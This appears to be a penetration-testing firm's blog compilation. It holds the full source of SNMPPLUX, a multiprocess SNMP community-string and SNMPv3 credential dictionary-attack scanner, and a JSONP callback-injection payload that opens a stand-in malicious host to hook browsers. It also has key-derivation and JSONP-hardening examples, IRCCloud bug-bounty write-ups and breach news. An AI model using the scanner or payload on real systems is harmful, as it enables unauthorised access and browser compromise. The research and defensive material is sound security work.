SNMPPLUX

Pentura continually develops new tools and scripts to improve the effectiveness of the team. One such tool, SNMPPLUX, is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM-compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by pysnmp together with the sys, getopt and multiprocessing Python modules.
As well as providing SNMPv1 and v2c community-string dictionary attacks, it also provides username and password dictionary attacks against SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Multiprocessing is currently used to speed up testing with parallel processes, and further improvements are planned. A library version of this code is also utilised as part of the ORR project.
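The pass-phrase dictionary attack described above works because a USM authentication key is derived deterministically from the pass-phrase and the agent's snmpEngineID (RFC 3414, Appendix A.2) with no secret salt, so the entropy of the pass-phrase is the only margin a device has. The following is an added example, not part of SNMPPLUX or of pysnmp, that implements that derivation and checks it against the RFC's "maplesyrup" test vector; the function names are this example's own.

```python
import hashlib

# RFC 3414 Appendix A.3 test vector (copied from the RFC, not from SNMPPLUX)
RFC3414_PASSWORD = b"maplesyrup"
RFC3414_ENGINE_ID = bytes.fromhex("000000000000000000000002")

ONE_MIB = 1048576


def password_to_key(password, hash_name):
    """RFC 3414 A.2: repeat the pass-phrase until 1 MiB has been fed to the
    hash, giving the engine-independent key Ku.  hash_name is 'md5' or 'sha1'
    for the protocols SNMPPLUX tests; RFC 7860 applies the same construction
    to the SHA-2 family."""
    if len(password) < 8:
        raise ValueError("USM pass-phrases must be at least 8 octets")
    reps = ONE_MIB // len(password) + 1
    stream = (password * reps)[:ONE_MIB]
    return hashlib.new(hash_name, stream).digest()


def localize_key(ku, engine_id, hash_name):
    """RFC 3414 section 2.6: Kul = H(Ku || snmpEngineID || Ku).  The engine ID
    is the only per-device input and it is public, so it is a non-secret salt:
    it stops one agent's key being replayed against another, nothing more."""
    return hashlib.new(hash_name, ku + engine_id + ku).digest()


def usm_localized_key(password, engine_id, hash_name):
    """Full derivation from pass-phrase to the per-agent key, hex-encoded."""
    ku = password_to_key(password, hash_name)
    return localize_key(ku, engine_id, hash_name).hex()


def keys_differ_per_engine(password, engine_a, engine_b, hash_name="sha1"):
    """True when the same pass-phrase yields different keys on two agents.
    A correct guess of the pass-phrase still unlocks every agent that shares
    it, which is why a pass-phrase shared across devices is the real exposure."""
    return (usm_localized_key(password, engine_a, hash_name)
            != usm_localized_key(password, engine_b, hash_name))


if __name__ == "__main__":
    for name in ("md5", "sha1"):
        print(name, usm_localized_key(RFC3414_PASSWORD, RFC3414_ENGINE_ID, name))
```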

[Screenshot showing example operation]

The current source code for this tool is included below on an as-is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software:

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX

-----------------------snmpplux0.3.py source--------------------------------
#!/usr/bin/env python3
# SNMPPLUX 0.3 - SNMPv1/v2c community-string and SNMPv3 USM credential scanner.
# Each check sends one GET for sysDescr.0 with a candidate credential; a reply
# that carries no error means the agent accepted it, and the hit is printed.
import getopt
import sys
from multiprocessing import Pool

from pysnmp.hlapi import *

SNMP_PORT = 161


def banner():
    print('.')
    print(r' /   _____/ \      \    /     \______    \______   \    |   |    |   \   \/  /')
    print(r' \_____  \  /   |   \  /  \ /  \|     ___/|     ___/    |   |    |   /\     / ')
    print(r' /        \/    |    \/    Y    \    |    |    |   |    |___|    |  / /     \ ')
    print(r'/_______  /\____|__  /\____|__  /____|    |____|   |_______ \______/ /___/\  \ ')
    print(r'        \/         \/         \/                           \/              \_/')
    print(' ')
    print('Liam Romanis')
    print('version 0.3b - beta testing')
    print('http://www.pentura.com')
    print('.')


def opts(argv):
    """Parse -i <targets> -u <users> -p <passwords>; all three files are required."""
    usage = 'snmpplux0.3.py -i <inputfile> -u <userfile> -p <passfile>'
    inputfile = userfile = passfile = ''
    try:
        options, _ = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=', 'pfile=', 'help'])
    except getopt.GetoptError:
        print(usage)
        sys.exit(2)
    for opt, arg in options:
        if opt in ('-h', '--help'):
            print(usage)
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg
    if not (inputfile and userfile and passfile):
        print(usage)
        sys.exit(2)
    return inputfile, userfile, passfile


def probe(ip, auth):
    """Send one GET for sysDescr.0 using the given CommunityData or UsmUserData.
    Returns True only when the agent answers without an error indication or
    error status, i.e. when the credentials were accepted."""
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
            SnmpEngine(), auth, UdpTransportTarget((ip, SNMP_PORT)), ContextData(),
            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
    except Exception as exc:
        # pysnmp raises for credentials it cannot encode (e.g. a malformed pass-phrase)
        print('exception for %s: %s' % (ip, exc))
        return False
    return not errorIndication and not errorStatus


def snmp1dict(ip, comm):
    # mpModel=0 selects SNMPv1
    if probe(ip, CommunityData(comm, mpModel=0)):
        print("SNMPv1: %s: Community:%s" % (ip, comm))


def snmp2dict(ip, comm):
    # the default mpModel=1 selects SNMPv2c
    if probe(ip, CommunityData(comm)):
        print("SNMPv2: %s: Community:%s" % (ip, comm))


def snmp3_authNone_privNone(ip, user):
    # noAuthNoPriv: the user name alone is accepted
    if probe(ip, UsmUserData(user)):
        print("SNMPv3 Auth None Priv None: %s: %s - no pass required" % (ip, user))


def snmp3_authMD5_privNone(ip, user, passwd):
    # authNoPriv with pysnmp's default auth protocol (HMAC-MD5)
    if probe(ip, UsmUserData(user, passwd)):
        print("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))


def snmp3_authMD5_privDES(ip, user, passwd):
    # authPriv with pysnmp's defaults (HMAC-MD5 / DES); the same pass-phrase is
    # tried for both the auth and the priv key, as the original tool does
    if probe(ip, UsmUserData(user, passwd, passwd)):
        print("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip, user, passwd))


def snmp3_authSHA_privAES128(ip, user, passwd):
    if probe(ip, UsmUserData(user, passwd, passwd,
                             authProtocol=usmHMACSHAAuthProtocol,
                             privProtocol=usmAesCfb128Protocol)):
        print("SNMPv3 Auth SHA Priv AES128: %s: %s:%s" % (ip, user, passwd))


def snmp3_authSHA_privAES192(ip, user, passwd):
    if probe(ip, UsmUserData(user, passwd, passwd,
                             authProtocol=usmHMACSHAAuthProtocol,
                             privProtocol=usmAesCfb192Protocol)):
        print("SNMPv3 Auth SHA Priv AES192: %s: %s:%s" % (ip, user, passwd))


def snmp3_authSHA_privAES256(ip, user, passwd):
    if probe(ip, UsmUserData(user, passwd, passwd,
                             authProtocol=usmHMACSHAAuthProtocol,
                             privProtocol=usmAesCfb256Protocol)):
        print("SNMPv3 Auth SHA Priv AES256: %s: %s:%s" % (ip, user, passwd))


def snmp3_authSHA_privDES(ip, user, passwd):
    if probe(ip, UsmUserData(user, passwd, passwd,
                             authProtocol=usmHMACSHAAuthProtocol,
                             privProtocol=usmDESPrivProtocol)):
        print("SNMPv3 Auth SHA Priv DES: %s: %s:%s" % (ip, user, passwd))


def snmp3_authSHA_priv3DES(ip, user, passwd):
    if probe(ip, UsmUserData(user, passwd, passwd,
                             authProtocol=usmHMACSHAAuthProtocol,
                             privProtocol=usm3DESEDEPrivProtocol)):
        print("SNMPv3 Auth SHA Priv 3DES: %s: %s:%s" % (ip, user, passwd))


# Pool.map takes a single argument, so each helper unpacks one job tuple
def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)


def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)


def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)


def snmp3shaaes_helper(args):
    return (snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args),
            snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args),
            snmp3_authSHA_priv3DES(*args))


def read_list(path):
    """One entry per line; surrounding whitespace and blank lines are dropped."""
    with open(path, "r") as fh:
        return [line.strip() for line in fh if line.strip()]


if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    targs = read_list(inputfile)
    users = read_list(userfile)
    # USM pass-phrases must be at least 8 characters (RFC 3414), so shorter
    # candidates are skipped rather than sent
    passwords = [w for w in read_list(passfile) if len(w) >= 8]
    # community strings are read from dict.txt in the working directory
    communities = read_list("dict.txt")

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job2_args)  # the original mapped job1_args here by mistake
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    p.map(snmp3shaaes_helper, job3_args)  # same (ip, user, passwd) set as the MD5 jobs
    p.close()
    p.join()
-----------------------end of snmpplux0.3.py source-------------------------

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis, are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Without limiting the foregoing, Pentura Ltd make no warranty that:
• the software will meet your requirements.
• the software will be uninterrupted, timely, secure or error-free.
• the results that may be obtained from the use of the software will be effective, accurate or reliable.
• the quality of the software will meet your expectations.
• any errors in the software obtained from the OpenSHA.org web site will be corrected.

Software and its documentation made available on the http://www.pentura.com web site:
• could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site.
• may be out of date, and Pentura and its contributors make no commitment to update such materials.

Pentura, and its contributors, assume no responsibility for errors or omissions in the software or documentation available from the http://www.pentura.com web site.
In no event shall Pentura, or its contributors, be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors have been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it is possible to abuse JSONP callbacks using a vulnerability known as SOME (Same Origin Method Execution), which an attacker can use to widely abuse a user's trust between the web application and its intended flow of execution. For example, using the SOME attack an attacker can trick a user into visiting a malicious web page that contains a link to the host web application's API with a JSONP callback parameter that the attacker controls.

An example of this would be as follows:
http://example.com/api/get_user.json?id=1&callback=logResults

The above URL could be an example of a method for a third party to obtain the user account associated with user ID 1, and would return something similar to the following:
logResults({"username": "admin", "email_address":"test@example.com"});

However, using the SOME attack it is possible to change the callback function to anything that JavaScript or the API recognises, for example:
http://example.com/api/get_user.json?id=1&callback=window.open('http://malicious.site/evil.php');//

which would return something similar to the following:
window.open('http://malicious.site/evil.php');//({"username": "admin", "email_address":"test@example.com"});

In this example the URL above would open a window from the user's browser and direct them to http://malicious.site/evil.php (the trailing // comments out the rest of the response so it is never parsed), which could infect the user's browser with a persistent XSS hook such as BeEF or similar.

A lot of web applications set Same Origin Policy headers that attempt to prevent attackers from loading pages or resources from external entities. However, this attack bypasses that in two ways. First, JSONP (JSON with Padding) is expected to be used externally, as that is what it was designed for; second, all calls to the resource are loaded from the same origin, which means the request never gets picked up by the Same Origin Policy.

Whilst performing some testing with this vulnerability, I found that it was also possible to abuse it remotely by bypassing the Same Origin Policy using a few tricks, such as loading the affected URL directly from an <img src=""> tag or a <script> tag, which are not blocked by the Same Origin Policy. This allows an attacker to perform a virtually unlimited number of actions on the application in the context of the unsuspecting victim user. These actions could range from stealing personal images, releasing data and stealing cookies to simply performing malicious acts such as infecting the user with BeEF.

During this research I found that most of the major websites, including Microsoft, Facebook, Google, etc., are all vulnerable to this type of attack. The one thing they all have in common is open-source JavaScript frameworks such as jQuery, PrototypeJS, AngularJS and more. These JavaScript frameworks appear to allow the SOME vulnerability to be present without any (easy) way of removing the functionality.
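A server-side mitigation for the callback injection shown above, as an added example that is not from the post: the endpoint only echoes a callback that is a plain JavaScript identifier (optionally one from an allow-list), sends the response as application/javascript with nosniff, and escapes the payload so it cannot break out of the script context either. The names validate_callback, render_jsonp and the KNOWN_CALLBACKS entries are this example's own assumptions.

```python
import json
import re

# A callback must be a bare JavaScript identifier: no dots, brackets,
# parentheses, quotes or comment markers, so a value such as
#   window.open('http://malicious.site/evil.php');//
# is rejected before it can reach the response body as code.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}")

# Assumed allow-list of the callback names the front end actually registers.
KNOWN_CALLBACKS = {"logResults", "handleUser"}


def validate_callback(name, allowed=KNOWN_CALLBACKS):
    """Return the callback name if it is safe to echo, otherwise raise ValueError.
    Pass allowed=None to accept any identifier when no allow-list is maintained."""
    if not name or not CALLBACK_RE.fullmatch(name):
        raise ValueError("callback is not a plain identifier")
    if allowed is not None and name not in allowed:
        raise ValueError("callback is not a registered handler")
    return name


def escape_for_script(body):
    """JSON is not quite JavaScript: '<' and '>' could close a script tag when
    the response is embedded inline, and U+2028/U+2029 are line terminators in
    JavaScript but not in JSON, so all four are emitted as \\u escapes."""
    return (body.replace("<", "\\u003c").replace(">", "\\u003e")
                .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def render_jsonp(callback, payload, allowed=KNOWN_CALLBACKS):
    """Build the JSONP response body and the headers that keep it a script.
    Returns (body, headers); raises ValueError for an unsafe callback."""
    name = validate_callback(callback, allowed)
    body = escape_for_script(json.dumps(payload))
    headers = {
        # Declared as a script (not JSON) and never sniffed into something else
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    # The leading /**/ is the usual guard against the response being reused
    # as another file type (the Rosetta Flash technique).
    return "/**/%s(%s);" % (name, body), headers


if __name__ == "__main__":
    user = {"username": "admin", "email_address": "test@example.com"}
    print(render_jsonp("logResults", user)[0])
    for bad in ("window.open('http://malicious.site/evil.php');//", "alert", ""):
        try:
            render_jsonp(bad, user)
        except ValueError as exc:
            print("rejected %r: %s" % (bad, exc))
```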

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to download a new client on every computer I was on (as it’s a web service).

After trying the Beta which was a free option before they publicly released the paid version, I thought I’d try and find some vulnerabilities to report to them – for no other reason than to ensure that the service that I am using can’t be exploited to disclose any of my information or data.

The first issue I identified was in the application's pastebin feature: when the user pastes a large amount of text, they get the option to upload it to IRCCloud's own proprietary pastebin service.

However, after performing some testing to execute JavaScript within the resulting pastebin link, I found that it was possible to insert a new line (\n) followed by a cross-site scripting payload, which was executed, giving full pre-authenticated persistent cross-site scripting.

Read the full report on HackerOne.

[IRCCloud] Inadequate input validation on API endpoint leading to self denial of service and increased system load

So, as you do, I was just looking around, manually fuzzing some WebSocket requests, seeing if I could get any sort of XSS, remote IRC command injection or SQLi mainly; it turned out that I didn't find much there that was worth noting. So I started checking whether their logic was all right, and one of their requests looked similar to:

{"_reqid":1234, "cid":5678, "to": "#treehouse", "msg":"test", "method":"say"}

I thought, all right, what if I can send a message to multiple channels, so I changed the "to" parameter to be an array: "to":["#treehouse", "#darkscience"]. Then all of a sudden my account got disabled. So I booted up irssi and jumped on to the support channel to speak to the security engineers there. RJ (the one I spoke to) confirmed that the request put my account into an infinite loop attempting to send to a string-type channel when an array had been given. This started filling up the internal queues and increasing the RAM usage. He then fixed the issue with some difficulty. I submitted it as a report on HackerOne just so they had a record of it.

With some further discussion with RJ and James (another IRCCloud security engineer), it would have been possible to create multiple "test accounts", which would have been propagated over the other servers, and perform the attack across those test accounts, which in turn may have brought down the servers due to a lack of disk space or other resources.

IRCCloud were brilliant in dealing with the report, and the timely responses received from James, even when it was out of working hours, were by far the best that I had ever seen. *tilts hat to James*

Here is the full report issued to IRCCloud on HackerOne.

Most businesses do not understand data breach risks

Research by HP has uncovered a lack of understanding among businesses of the risks associated with data breaches. More than 70% of US and UK executives surveyed by the Ponemon Institute said that their organisation does not understand fully the dangers of breaches, while less than half of top executives and board members are kept informed about the response process.

The 2014 Executive Breach Preparedness Research Report was designed to highlight the importance of senior executive involvement in the response to data breaches. While 79% of the nearly 500 senior executives polled agreed that executive-level involvement in the response process was necessary for a successful resolution, only 45% said that they were accountable for the process. The research also found that most executives are more concerned about threats from within their business than about external attacks.

As we discussed last week, the financial cost of data breaches can be huge, not to mention the missed revenue due to reputational damage. This is why direction and leadership are needed from those at the top. Executives need to be aware of and actively involved in the data breach response process, and there needs to be a clear plan in place to prevent security incidents from escalating into a complete disaster for the company.

The Ponemon Institute noted that senior executives and board members may have been complacent about the effects of cyber-attacks and data breaches in the past, but are now gradually realising the damaging costs of such incidents. This is welcome news, and we hope that senior executives will continue to take a more active role in their response to data breaches, educating themselves and their staff about the risks and starting to invest in the best security technology available.

Research Reveals Cost of Online Fraud to UK

This week has been Get Safe Online Week and, to coincide with the event, the National Fraud Intelligence Bureau researched cyber-crime in the UK. The research found that over the last year the ten biggest online scams cost victims over £670m, although the actual figure is thought to be significantly higher than that due to unreported crimes.

A separate poll found that while over half of Britons have been a victim of online fraud, ID theft, hacking or online abuse, only a third of them reported the crime. One of the reasons for this is that many people did not know how to report it. It is hoped that this will be improved by the development of Action Fraud, the UK's national fraud reporting centre, and the increasing resources that the Government is dedicating to cyber-crime.

The research also suggests that cyber-crime is increasingly being taken more seriously by the British public. Around 53% said they now see it as a serious “physical world” crime and 42% stated that they are now more vigilant when shopping online. Despite this change in attitude, many people are still failing to take basic security measures with 67% of tablet owners and 54% of mobile phone owners in the survey not having a password or PIN to secure their device.

It's good to see that initiatives like Get Safe Online Week and Action Fraud are raising awareness of online crime and what people can do to prevent it. However, this research is a stark reminder of the dangers that we all face online. Online fraud continues to increase as crime overall falls, with criminals constantly developing new ways of targeting victims online.

At Pentura we believe that education is the key in the fight against cyber-crime. Our LearnwithPentura e-learning portal provides users with advice on security and best practice, with eight online modules ranging from email to removable media. Complacency is not an option, and businesses and authorities must continue to raise awareness of the dangers of online crime and educate users in cyber security.

Kmart hit by card hack attack

It’s been revealed that a data breach at US retail chain Kmart that compromised card details lasted over a month. The discount department store said that the malware was discovered last week but had been operating since early September. Based on its investigation so far, the company said that it believes credit and debit cards were exposed but that no personal information, PIN numbers, email addresses or social security numbers were accessed.

The incident is the latest in a string of cyber-attacks on American retailers. Last week, restaurant chain Dairy Queen revealed that hackers had stolen names, card numbers and expiration dates of around 600,000 cards across 395 of its restaurants. There have also been huge recent attacks on Home Depot, in which 56 million cards were affected, and on Target, when 40 million cards were compromised in the run-up to Christmas 2013.

It’s not thought that the breached information is being used to create counterfeit cards or encumber customers with bills for items that they haven’t bought. Nevertheless, the attack is a reminder and a warning to retailers that the sheer size of their computer networks makes them an attractive target to hackers. By improving detection times, large chains will reduce the damage caused by such breaches and better protect both their customers and their reputation.

AT&T suffers insider data breach

AT&T has become the latest multinational company to suffer a data breach after one of its own employees gained access to customer data. The US mobile telecoms giant has started informing around 1,600 customers in Vermont that their personal data was breached in August.

In a letter posted on the Vermont government’s website, AT&T confirmed that a former employee had broken the company’s privacy policy and obtained customer data, including unique customer numbers, social security numbers and driver’s license numbers. AT&T has not said why the employee stole the information or whether he used it for malicious purposes, but it is nevertheless a serious breach and the federal authorities have been informed.

Although this is a smaller incident in comparison to recent cyber-attacks on JPMorgan Chase and iCloud, it is a reminder to IT managers about the dangers of insider data breaches. Whether intentional or not, internal breaches can be equally as damaging as external attacks and IT departments ignore this at their peril. Ensuring that your internal policies and controls are watertight and that employees are educated in data security is just as important as protecting your network from outside cyber-attacks.

New security flaw uncovered in WordPress

Researchers have revealed a potentially serious flaw in WordPress software that allows hackers to search for abandoned or inactive WordPress sites before mounting phishing attacks aimed at enticing users to install infected updates. Hackers can then quickly hijack the website and direct visitors to malicious content.

WordPress is by far the most popular content management system. Having initially found success as a blogging platform, it is now hugely popular for business websites, operating as either a framework or a hosting service. However, the open-source nature of the system, as well as its popularity among web novices, does make it vulnerable when flaws are found. The report encountered several compromised WordPress websites.

WordPress offers a potentially easy entry point for hackers to introduce malware onto networks. By failing to maintain and update WordPress websites and plugins, businesses are leaving themselves susceptible to attack. Businesses should be telling staff to install updates and plugins only from trusted sources and raising awareness of this tactic. By properly educating staff and regularly updating WordPress, businesses will be able to close off potential weaknesses and reduce their susceptibility to attack.

Shell Shock Rapid 7 Threatsweeper

By now, you may have heard about CVE-2014-6271, also known as the "bash bug" or "Shell Shock", which may affect your organisation. It is rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

How do you protect yourself?

The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though the fix for CVE-2014-6271 is not complete, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it's critical that they are protected behind a firewall, and that you test whether that firewall is secure.

How can we help?

Pentura Threatsweeper service (Powered by Rapid7) has been updated with authenticated and remote checks for CVE-2014-6271. Checks for CVE-2014-7169 will follow as soon as they are verified.

If you have any questions, please contact the Pentura support team: support@pentura.com

Many thanks,

The Pentura Team